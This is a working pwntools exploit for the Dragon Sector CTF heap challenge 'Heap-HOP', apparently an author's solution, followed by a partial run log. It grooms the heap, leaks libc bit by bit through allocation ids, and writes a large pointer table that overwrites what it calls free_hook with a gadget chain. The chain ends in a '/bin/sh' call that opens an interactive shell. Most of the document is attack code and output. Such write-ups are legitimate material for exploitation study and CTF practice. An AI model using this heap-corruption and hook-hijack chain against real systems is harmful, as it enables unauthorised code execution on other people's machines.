Heap-HOP Dragon Sector CTF
from pwn import * | |
# --- Session setup -----------------------------------------------------------
# The arch drives how pwntools packs p32/p64/flat() for the payloads below.
context.arch = "amd64"
context.terminal = ["tmux", "splitw", "-h", "-f"]
# gdb command(s) to run on attach, e.g. "b* $_base()+0x1586" for a breakpoint
# relative to the PIE base. Empty means attach without breakpoints.
cmd = ""
DEBUG = 0
# Local target; swap for the remote() line to run against the challenge host.
p = process("./heap")
# p = remote("yetanotherheap.hackable.software", 1337)
if DEBUG:
    # gef is loaded through gdb's --init-eval-command so the attached session
    # has it available; only used when DEBUG is non-zero.
    gdb.attach(p, cmd, gdb_args=['--init-eval-command="source ~/ctf/tools/gef/gef.py"'])
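def alloc(sz, content):
    """Drive menu option 1 ("allocate") and return the object id it prints.

    sz is sent as the requested size and content as the object body (str or
    bytes; pwntools encodes str). The id is read from the "id: <n>" line the
    binary prints between the size and content prompts.

    Returns the parsed id, or 0 when the id field is not an integer (a
    deliberate best-effort fallback so the exploit keeps going). Any other
    failure while talking to the tube (EOFError on a crashed target, a
    timeout) propagates instead of being silently turned into id 0.
    """
    p.sendlineafter(">", "1")
    p.sendlineafter(":", str(sz))
    p.recvuntil("id: ")
    raw_id = p.recvuntil("\n", drop=True)
    try:
        objid = int(raw_id)
    except ValueError:
        # Only a malformed id field is tolerated; the former bare except also
        # swallowed EOF/KeyboardInterrupt and hid a dead target.
        objid = 0
    p.sendlineafter("content:", content)
    print("alloc({}, {}...) = {}".format(sz, content[:7], objid))
    return objid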
def free(objid):
    """Drive menu option 2 ("free") for object *objid*.

    Nothing is read back from the binary; callers rely on the next prompt.
    """
    choice, target = "2", str(objid)
    p.sendlineafter(">", choice)
    p.sendlineafter("id:", target)
# --- Stage 1: heap grooming --------------------------------------------------
# Three objects in three size classes, then free id 0 (an id none of the
# allocations above returned) and allocate a 0x20 body whose first two dwords
# are 0x610 and 0xfffffff9 padded with 0xff. Free id 97 (the second object, per
# the transcript) and take its size class again. What this does to the
# allocator's metadata depends on the challenge binary, which is not in view;
# the values are the ones the working exploit used.
alloc(0x1f, "1" + "A" * 30)
alloc(0xf, "A" * 15)
alloc(0x2f, "A" * 0x2f)
free(0)
hdr = p32(0x610) + p32(0xfffffff9)
alloc(0x20, hdr.ljust(32, b"\xff"))
free(97)
alloc(0xf, "A" * 15)
# Keep allocating 0xf-byte objects until the binary hands out id 127. i is the
# number of non-127 ids seen and is reused as the content prefix afterwards.
i = 0
while True:
    if alloc(0xf, str(i).ljust(15, "A")) == 127:
        break
    i += 1
# --- Stage 2: libc leak, one bit per allocation ------------------------------
# Ids 128..191 are treated as a 64-bit bitmap: every id the binary actually
# returns clears its bit, ids it skips leave the bit set. Stops at id 191.
data = [1] * 64
while True:
    c = alloc(0xf, str(i).ljust(15, "A"))
    data[c - 128] = 0
    if c == 127 + 64:
        break
# Bit for id 128 is the least significant, so reverse to MSB-first and fold.
data = data[::-1]
libc_leak = 0
for bit in data:
    libc_leak = (libc_leak << 1) | bit
print(hex(libc_leak))
# Fixed offsets for the target's libc build (presumably a main_arena pointer
# for the served glibc; confirm against the provided libc before reusing).
base = libc_leak - 2014176
pbuffer = base + 2036952
# --- Stage 3: plant a fake object and prime a huge allocation -----------------
# 191 zero qwords, then a 0x611 size-looking field, a 4-byte "id\0\0" tag, a
# dword 1 and a zero qword. This mirrors whatever per-object header the binary
# keeps (not visible here); the values are the working exploit's.
fake_obj = p64(0) * 191 + p64(0x611) + b"id\x00\x00" + p32(0x1) + p64(0x0)
alloc(0x610, fake_obj)
print(hex(pbuffer))
# Second 0x610 object: a libc-range pointer (pbuffer) at offset 0x28, rest zero.
alloc(0x610, (b"\x00" * 0x28 + p64(pbuffer)).ljust(0x610, b"\x00"))
alloc(0x800, "A" * 0x800)
free(288)
# Re-allocate the 0x800 class (the transcript shows id 288 coming back) with
# 0x5b10 -- the size of the final allocation -- two -1 dwords and INT_MAX,
# padded with 0xff.
sizes = p32(0x5b10) + p32(0xffffffff) * 2 + p32(0x7fffffff)
alloc(0x800, sizes.ljust(0x800, b"\xff"))
print(hex(base))
buf_idx = 2875  # qword index in the 0x5b10 payload that lands at pbuffer (per original note)
payload = [0, 0, 0, 0, 0, 0, 0, 0, 2019168+base, 0, 0, 0, 644464+base, 646128+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 93824992252560, 0, 2014176+base, 2014176+base, 2014192+base, 2014192+base, 2014208+base, 2014208+base, 2014224+base, 2014224+base, 2014240+base, 2014240+base, 2014256+base, 2014256+base, 2014272+base, 2014272+base, 2014288+base, 2014288+base, 2014304+base, 2014304+base, 2014320+base, 2014320+base, 2014336+base, 2014336+base, 2014352+base, 2014352+base, 2014368+base, 2014368+base, 2014384+base, 2014384+base, 2014400+base, 2014400+base, 2014416+base, 2014416+base, 2014432+base, 2014432+base, 2014448+base, 2014448+base, 2014464+base, 2014464+base, 2014480+base, 2014480+base, 2014496+base, 2014496+base, 2014512+base, 2014512+base, 2014528+base, 2014528+base, 2014544+base, 2014544+base, 2014560+base, 2014560+base, 2014576+base, 2014576+base, 2014592+base, 2014592+base, 2014608+base, 2014608+base, 2014624+base, 2014624+base, 2014640+base, 2014640+base, 2014656+base, 2014656+base, 2014672+base, 2014672+base, 2014688+base, 2014688+base, 2014704+base, 2014704+base, 2014720+base, 2014720+base, 2014736+base, 2014736+base, 2014752+base, 2014752+base, 2014768+base, 2014768+base, 2014784+base, 2014784+base, 2014800+base, 2014800+base, 2014816+base, 2014816+base, 2014832+base, 2014832+base, 2014848+base, 2014848+base, 2014864+base, 2014864+base, 2014880+base, 2014880+base, 2014896+base, 2014896+base, 2014912+base, 2014912+base, 2014928+base, 2014928+base, 2014944+base, 2014944+base, 2014960+base, 2014960+base, 2014976+base, 2014976+base, 2014992+base, 2014992+base, 2015008+base, 2015008+base, 2015024+base, 2015024+base, 2015040+base, 2015040+base, 2015056+base, 2015056+base, 2015072+base, 2015072+base, 2015088+base, 2015088+base, 2015104+base, 2015104+base, 2015120+base, 2015120+base, 2015136+base, 2015136+base, 2015152+base, 2015152+base, 2015168+base, 2015168+base, 2015184+base, 2015184+base, 2015200+base, 2015200+base, 2015216+base, 2015216+base, 
2015232+base, 2015232+base, 2015248+base, 2015248+base, 2015264+base, 2015264+base, 2015280+base, 2015280+base, 2015296+base, 2015296+base, 2015312+base, 2015312+base, 2015328+base, 2015328+base, 2015344+base, 2015344+base, 2015360+base, 2015360+base, 2015376+base, 2015376+base, 2015392+base, 2015392+base, 2015408+base, 2015408+base, 2015424+base, 2015424+base, 2015440+base, 2015440+base, 2015456+base, 2015456+base, 2015472+base, 2015472+base, 2015488+base, 2015488+base, 2015504+base, 2015504+base, 2015520+base, 2015520+base, 2015536+base, 2015536+base, 2015552+base, 2015552+base, 2015568+base, 2015568+base, 2015584+base, 2015584+base, 2015600+base, 2015600+base, 2015616+base, 2015616+base, 2015632+base, 2015632+base, 2015648+base, 2015648+base, 2015664+base, 2015664+base, 2015680+base, 2015680+base, 2015696+base, 2015696+base, 2015712+base, 2015712+base, 2015728+base, 2015728+base, 2015744+base, 2015744+base, 2015760+base, 2015760+base, 2015776+base, 2015776+base, 2015792+base, 2015792+base, 2015808+base, 2015808+base, 2015824+base, 2015824+base, 2015840+base, 2015840+base, 2015856+base, 2015856+base, 2015872+base, 2015872+base, 2015888+base, 2015888+base, 2015904+base, 2015904+base, 2015920+base, 2015920+base, 2015936+base, 2015936+base, 2015952+base, 2015952+base, 2015968+base, 2015968+base, 2015984+base, 2015984+base, 2016000+base, 2016000+base, 2016016+base, 2016016+base, 2016032+base, 2016032+base, 2016048+base, 2016048+base, 2016064+base, 2016064+base, 2016080+base, 2016080+base, 2016096+base, 2016096+base, 2016112+base, 2016112+base, 2016128+base, 2016128+base, 2016144+base, 2016144+base, 2016160+base, 2016160+base, 2016176+base, 2016176+base, 2016192+base, 2016192+base, 0, 0, 2014080+base, 0, 1, 135168, 135168, 654592+base, 660880+base, 0, 1804581+base, 1804581+base, 136561050+base, 136561029+base, 0, 0, 0, 1, 2, 2029592+base, 0, 18446744073709551615, 1830272+base, 0, 2000576+base, 2001920+base, 2002048+base, 2004224+base, 2001472+base, 2001344+base, 0, 
2003392+base, 2003488+base, 2003616+base, 2003808+base, 2003936+base, 2004032+base, 1700800+base, 1696960+base, 1698496+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 0, 0, 0, 2016704+base, 0, 0, 0, 4222427270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2016928+base, 2, 18446744073709551615, 0, 2024624+base, 18446744073709551615, 0, 2013056+base, 0, 0, 0, 0, 0, 0, 2020512+base, 4222427268, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2013568+base, 1, 18446744073709551615, 0, 2024640+base, 18446744073709551615, 0, 2013312+base, 0, 0, 0, 0, 0, 0, 2020512+base, 2016704+base, 2016928+base, 2013568+base, 160768+base, 1680176+base, 1684208+base, 1684256+base, 1684352+base, 1684944+base, 1685456+base, 1685696+base, 1685744+base, 1685840+base, 1685920+base, 704112+base, 1686320+base, 1686400+base, 1686512+base, 1686640+base, 1165264+base, 1686656+base, 1686720+base, 1327520+base, 1686912+base, 1687040+base, 1687296+base, 1687424+base, 1401136+base, 1687456+base, 1687504+base, 1687552+base, 1687600+base, 1687648+base, 1687824+base, 0, 0, 0, 0, 612864+base, 486960+base, 610496+base, 610512+base, 616448+base, 610608+base, 611136+base, 612976+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 0, 0, 0, 0, 0, 0, 0, 565856+base, 513200+base, 610496+base, 610512+base, 565408+base, 566224+base, 568016+base, 612976+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 0, 0, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 611136+base, 548016+base, 612224+base, 595632+base, 595264+base, 544240+base, 547728+base, 547776+base, 547856+base, 547952+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 
611136+base, 596448+base, 612224+base, 595632+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 552432+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 557504+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 570944+base, 563648+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 570944+base, 569840+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 576192+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595680+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 576256+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595680+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595792+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 572000+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595632+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 580544+base, 569840+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 580448+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 
616864+base, 0, 0, 0, 0, 0, 583840+base, 617264+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 583760+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 585712+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 0, 586304+base, 0, 0, 0, 586128+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 602320+base, 605952+base, 600704+base, 610512+base, 616448+base, 599888+base, 595952+base, 595504+base, 612224+base, 595680+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 601184+base, 610512+base, 616448+base, 599888+base, 598144+base, 599536+base, 612224+base, 595680+base, 595856+base, 544240+base, 599840+base, 597984+base, 595840+base, 595792+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 598976+base, 596448+base, 612224+base, 595632+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 617264+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 614112+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 1, 4, 10979526148415287693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 136560104+base, 0, 0, 0, 93824992387072, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 136560088+base, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9437184, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] | |
# --- Stage 4: call chain through the hook slot -------------------------------
# Gadgets, libc-relative (from the original notes):
#   0x153a46 : mov rsi, r15 ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 8]
#   0x15486a : mov rdi, qword ptr [rax] ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 0x20]
#   0x1100db : mov rdx, qword ptr [rax + 0xb0] ; call qword ptr [rax + 0x88]
# Slot 1541 is what the original author labelled free_hook; if it is indeed
# __free_hook, the first gadget runs with rdi = the pointer being freed and
# the buf_idx slots form the fake object it walks. "/bin/sh" sits two qwords
# after pbuffer + 0x10's target, and 0xe62f0 is the final call target
# (unnamed in the script; presumably an exec-style libc function -- confirm
# with the libc's symbols).
patches = {
    1541: base + 0x153a46,  # free_hook (per original comment)
    buf_idx: pbuffer + 0x10,
    buf_idx + 1: base + 0x15486a,
    buf_idx + 2: u64("/bin/sh\x00"),
    buf_idx + 4: base + 0x1100db,
    buf_idx + 9: pbuffer,
    buf_idx + 17: base + 0xe62f0,
}
for slot, value in patches.items():
    payload[slot] = value
# One 0x5b10 allocation writes the whole table (flat() packs each int as a
# qword under context.arch = "amd64"); freeing id 97 then fires the hook.
alloc(0x5b10, flat(payload))
print(hex(base + 0x153a46))
free(97)
p.interactive()
[+] Opening connection to yetanotherheap.hackable.software on port 1337: Done | |
alloc(31, 1AAAAAA...) = 1 | |
alloc(15, AAAAAAA...) = 97 | |
alloc(47, AAAAAAA...) = 193 | |
alloc(32, b'\x10\x06\x00\x00\xf9\xff\xff'...) = 0 | |
alloc(15, AAAAAAA...) = 97 | |
alloc(15, 0AAAAAA...) = 98 | |
alloc(15, 1AAAAAA...) = 99 | |
alloc(15, 2AAAAAA...) = 100 | |
alloc(15, 3AAAAAA...) = 101 | |
alloc(15, 4AAAAAA...) = 102 | |
alloc(15, 5AAAAAA...) = 103 | |
alloc(15, 6AAAAAA...) = 111 | |
alloc(15, 7AAAAAA...) = 112 | |
alloc(15, 8AAAAAA...) = 113 | |
alloc(15, 9AAAAAA...) = 114 | |
alloc(15, 10AAAAA...) = 115 | |
alloc(15, 11AAAAA...) = 116 | |
alloc(15, 12AAAAA...) = 117 | |
alloc(15, 13AAAAA...) = 118 | |
alloc(15, 14AAAAA...) = 119 | |
alloc(15, 15AAAAA...) = 120 | |
alloc(15, 16AAAAA...) = 121 | |
alloc(15, 17AAAAA...) = 122 | |
alloc(15, 18AAAAA...) = 123 | |
alloc(15, 19AAAAA...) = 124 | |
alloc(15, 20AAAAA...) = 125 | |
alloc(15, 21AAAAA...) = 126 | |
alloc(15, 22AAAAA...) = 127 | |
alloc(15, 22AAAAA...) = 128 | |
alloc(15, 22AAAAA...) = 129 | |
alloc(15, 22AAAAA...) = 130 | |
alloc(15, 22AAAAA...) = 131 | |
alloc(15, 22AAAAA...) = 132 | |
alloc(15, 22AAAAA...) = 138 | |
alloc(15, 22AAAAA...) = 145 | |
alloc(15, 22AAAAA...) = 149 | |
alloc(15, 22AAAAA...) = 150 | |
alloc(15, 22AAAAA...) = 152 | |
alloc(15, 22AAAAA...) = 153 | |
alloc(15, 22AAAAA...) = 154 | |
alloc(15, 22AAAAA...) = 155 | |
alloc(15, 22AAAAA...) = 156 | |
alloc(15, 22AAAAA...) = 158 | |
alloc(15, 22AAAAA...) = 159 | |
alloc(15, 22AAAAA...) = 161 | |
alloc(15, 22AAAAA...) = 162 | |
alloc(15, 22AAAAA...) = 163 | |
alloc(15, 22AAAAA...) = 164 | |
